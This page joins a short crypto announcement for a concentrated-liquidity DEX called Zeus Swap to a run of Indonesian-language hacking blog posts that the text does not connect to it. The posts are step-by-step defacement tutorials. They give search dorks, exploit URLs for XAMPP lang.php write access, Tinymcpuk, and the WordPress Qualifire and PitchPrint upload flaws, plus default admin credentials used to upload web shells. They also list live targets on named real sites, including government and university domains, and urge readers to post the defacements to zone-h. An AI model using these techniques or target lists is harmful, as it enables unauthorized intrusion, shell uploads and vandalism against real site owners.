Introducing Zeus Swap

Zeus Swap


 Zeus Swap is determined to resolve this issue by providing concentrated liquidity, increasing the utilization rate. When liquidity is added in concentration to particular price ranges, more liquidity will be activated and utilized for actual swaps. This will bring larger revenue shares for LPs and facilitate the overall asset flow throughout the Metis ecosystem.

Zeus is a liquidity protocol built on Metis blockchain. It focuses on delivering a better trading experience and upgraded capital efficiency to DeFi users through the process of building its concentrated liquidity protocol and a series of affiliate functional modules on Metis L2 Blockchain.

In the context of the rapid development of the Metis ecosystem, Zeus Swap team is happy to announce that testing of its concentrated liquidity DEX is completed and we are ready to launch Zeus Swap Mainnet Beta.


Why CLMMs?

A focal task for Automated Market Makers is to distribute liquidity with higher capital efficiency. Liquidity optimization can be conducted in two ways :

By the use of mathematical formula implemented to create the perfect uniform liquidity curve for different scenarios.

By giving flexibility to liquidity providers in how they distribute their liquidity and rely on the market to optimize the liquidity distribution.

Concentrating liquidity means a liquidity provider isn’t inefficiently spreading liquidity uniformly at all prices. Instead, assets are allocated at specific, custom price ranges where price action is active. Like other models, all trading fees collected within a given custom trade range, captured as non-fungible LP tokens, are split to all suppliers proportional to the number of assets provided.





Xampp Local Write Access + Live Target

Assalamualaikum Wr. Wb.

Deface Poc Xampp Local Write Access - Halo sobat kacang. Kali ini, saya akan memberikan tutorial deface yang menurut saya paling easy, Lebih easy dari kindeditor. Cuman bedanya poc ini bisa dimirorin di zone-h. Kalian tau zone-h kan? Kalo Kalian gk tau kalian bisa cari tau disini.

Banyak defacer yang ngepush zone-h dengan poc xampp local write access. Kali ini gw juga udah nyediain puluhan live target. Semuanya fresh zone-h, cuman harus nunggu redefacement saja.

Oke langsung aja.

- Dork :
inurl:/security/lang.php
inurl:/xampp/lang.php

kembangin lagi gan

- Exploit
site.com/xampp/lang.php?Hacked_By_rizki ( untuk dir xampp )
site.com/security/lang.php?Hacked_By_rizki ( untuk dir security )

Note : "Hacked_By_Rizki" bisa diubah dengan nick kalian masing - masing.

- Langkah-langkah
1. Dorking dulu dengan dork yang sudah saya sediakan diatas atau jika kalian malas dorking, kalian bisa menggunakan live target yang sudah saya sediakan dibawah.
2. Jika sudah mendapatkan sitenya, kalian beri exploit yang sudah tersedia diatas.
Contoh :
http://site.com/xampp/lang.php?hacked_by_rizki ( dir xampp )
http://site.com/security/lang.php?hacked_by_rizki ( dir security )
3. Jika berhasil akan seperti gambar dibawah ini.
Gambar :
Gambar 1 ( Xampp Local Write Access )

4. Preview :
site.com/xampp/lang.tmp ( untuk dir xampp )
site.com/security/lang.tmp ( untuk dir security )
Gambar :
Gambar 2 ( Xampp Local Write Access )

5. Jika sudah, mirorin di zone-h :D

- Live Target
http://fleischhacker-homedefi.biz/xampp/lang.php?hacked_by_rizki
http://metrologi.kemendag.go.id/xampp/lang.php?hacked_by_rizki
https://www.ftsm.ukm.my/xampp/lang.php?hacked_by_rizki
http://a-pack.co.id/xampp/lang.php?hacked_by_rizki
http://online-gen.wbpdcl.co.in/xampp/lang.php?hacked_by_rizki
https://www.bombayworli.com/xampp/lang.php?hacked_by_rizki
https://www.xingyue.com/xampp/lang.php?hacked_by_rizki
https://www.crick99.com/xampp/lang.php?hacked_by_rizki
http://www.callbiz.com/xampp/lang.php?hacked_by_rizki

Mau lebih? usaha dong xixixi

Semoga bermanfaat.
Thank's To : Banyumas Cyber Team

-Adm1n

Deface Poc Backdoor Account Vulnerability


Assalamualaikum wr.wb. Halo gan, kembali lagi di Blog KacangCanggih hehe. Sorry jarang update artikel dikarenakan saya sibuk ngurusin sekolah. Hari ini saya akan memberikan tutor deface metode Backdoor Account Vulnerability. Oke langsung saja ke step by stepnya.

Dork
inurl:/amssplus/ intitle:"AMSS++"  
Kembangin Dorknya Maz
Account
User = admin
Password = 1234 
Tutorial

  • Kalian dorking dulu di search engine kesukaan kalian. 
  • Kalian coba login pake user dan pass diatas, jika masuk ke dashboard admin, berarti vuln. 
  • Silahkan kalian translate webnya dulu ke bahasa Indonesia, lalu cari menu informasi dasar guru & staf. 

  • Kemudian pilih Guru dan Personel saat ini. 

  • Setelah diklik, maka akan muncul list berupa data dan informasi guru/staf. 

  • Jika kalian ingin upload shell, kalian bisa buat data/info baru. 
  • Lalu klik gambar dua orang > klik kanan gambar rusak > buka di tab baru. 
  • Done! Shell Uploaded 
Terimakasih telah mmengunjungi Blog Kacang Canggih. Jangan lupa untuk membagikan artikel ini kepada temen temen kamu xD

Deface Poc Tinymcpuk File Upload


[+] Exploit Title = Tinymcpuk
[+] Author = KingSkrupellos
[+] Team = Cyberizm.Org Digital Security Team
[+] Google Dork =
Created by media tech indonesia
Created by media tech indonesia inurl:/statis-1 intext:whatsapp
Selebihnya use your brain :)
[+] Exploit = site.com/tinymcpuk/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Flash
[+] Tutorial =
1. Langkah pertama, kalian dorking dulu dengan menggunakan dork yang telah saya sediakan di atas pada search engine kesukaan kalian.
2. Biasanya website yang vuln tinymcpuk adalah website daihatsu, suzuki, toyota, dan lain - lain.
3. Jika sudah menemukan website yang kira - kira vuln tinymcpuk, kalian kemudian tambahkan exploit yang saya berikan diatas dibelakang URL website.
4. Selanjutnya, klik "Pilih File" dan kalian upload script deface kalian berextensi php.fla atau html.fla
Gambar :

5. Cara akses filenya gimana gan? site.com/tinymcpuk/gambar/Flash/scriptdefacekamu.php.fla

Live Target = http://daihatsubangkalan.com

Gimana? Mudah bukan? Tinggal mirorin deh.. Jika kalian ingin request tutor, cukup komen postingan diblog ini atau bisa hubungi kami lewat halaman contact diblog ini. There a problem? Google Your Friend!

-Adm1n

WordPress Themes Qualifire CSRF File Upload


[+] Exploit Title = WordPress Themes Qualifire CSRF File Upload
[+] Google Dork =

  • inurl:/wp-content/themes/qualifire
  • index of / wp-content/themes/qualifire
[+] Exploit = site.com/[path]/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
[+] Tutorial 
1. Dorking dulu menggunakan dork yang telah saya sediakan di atas pada search engine kesukaan kalian. 
2. Jika sudah menemukan target, tambahkan exploit seperti di atas di belakang URL website. Vulnerability? Tampilan website blank! 
3. Masuk ke CSRF Online banyak kok di google, tinggal kalian cari sendiri h3h3 :'v
4. Isi kolom pertama dengan target website yang vuln, isi kolom kedua dengan postfile "Filedata" lalu kunci target tersebut. 


5. Upload file kalian yang ber - extensi txt, jpg, png, gif kalau lagi hoki bisa upload shell :'3 
6. Akses filenya gimana gan? http://site.com/[path]/filekalian.txt atau http://site.com/filekalian.txt

Live Target = http://www.hintofsaffron.com/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Nah, gimana gan, so easy kan? :v Jika kalian ingin request tutor tinggal comment aja di kolom komentar. There a problem? Google Your Friend! 

Pendaftaran Kontributor Indonesian sites BUG File Upload


[+] Exploit Title = Pendaftaran Kontributor Indonesian sites BUG File Upload
[+] Author = Negat1ve
[+] Team = -1 and Electronic ThunderBolt Team
[+] Dork =
inurl:/kontributor intext:Terima kasih
inurl:/kontributor site:id
inurl:/kontributor site:net
inurl:/kontributor site:com
[+] Tutorial
1. Langkah pertama, kalian dorking dengan dork yang telah saya beri tadi.
2. Setelah itu, kalian login dengan email (email palsu juga gk apa apa), password, dll.
Gambar :

Maaf ya, banyak yang saya sensor h3h3 :v
3. Selanjutnya, isi security code, dan klik "Daftar Sekarang"
Gambar :

4. Selanjutnya kalian akan masuk pada halaman dashboard.
5. Lalu klik "Tambahkan Data"
Gambar :

6. Selanjutnya, terserah kalian mau di jso (Javascript Overlay) atau apalah itu.
7. Tinggal mirorin :)

Live Target :
http://dayabanten.com/kontributor

Nah, gimana pembahasan saya kali ini? Mudah bukan? Jika kalian ingin request, silahkan hubungi kami dikolom komentar atau pada halaman contact blog ini. Good Luck! There a problem? Google Your Friend!

-Admin

WordPress Plugin PitchPrint Arbitrary File Upload


WordPress Plugins PitchPrint rentan terhadap kerentanan yang memungkinkan penyerang mengunggah file sewenang-wenang karena aplikasi gagal memverifikasi dengan benar input yang diberikan pengguna. Penyerang dapat memanfaatkan kerentanan ini untuk mengunggah kode atau file sewenang-wenang dan menjalankannya dalam konteks proses server web.

[+] Google Dork = inurl:/wp-content/plugins/pitchprint/
[+] Exploit = /wp-content/plugins/pitchprint/uploader/
[+] CRSF =  Touch Me :*
[+] Only For File Types = jpg, png, jpeg, gif.
[+] Tutorial =

  • Dorking dulu dork yang telah saya sediakan diatas pada search engine kesayangan kalian, kalau bisa kembangin dorknya h3h3 :v 
  • Jika sudah mendapatkan target, tambahkan exploit diatas di belakang URL website. Vulnerability? See the picture! 


  • Masuk ke CSRF. Isi kolom pertama dengan URL website, isi kolom kedua dengan post file files[] 
  • Upload file kalian. Jika sudah terupload maka tampilan websitenya seperti gambar di bawah ini. 


  • Akses filenya gimana gan? http://site.com/wp-content/plugins/pitchprint/uploader/files/filekalian.jpg 

Itu saja tutorial dari saya, kurang lebihnya saya minta maaf jika terjadi kesalahan kata/kalimat yang tidak pantas. Terus kunjungi Blog KacangCanggih untuk mendapatkan informasi menarik lainnya.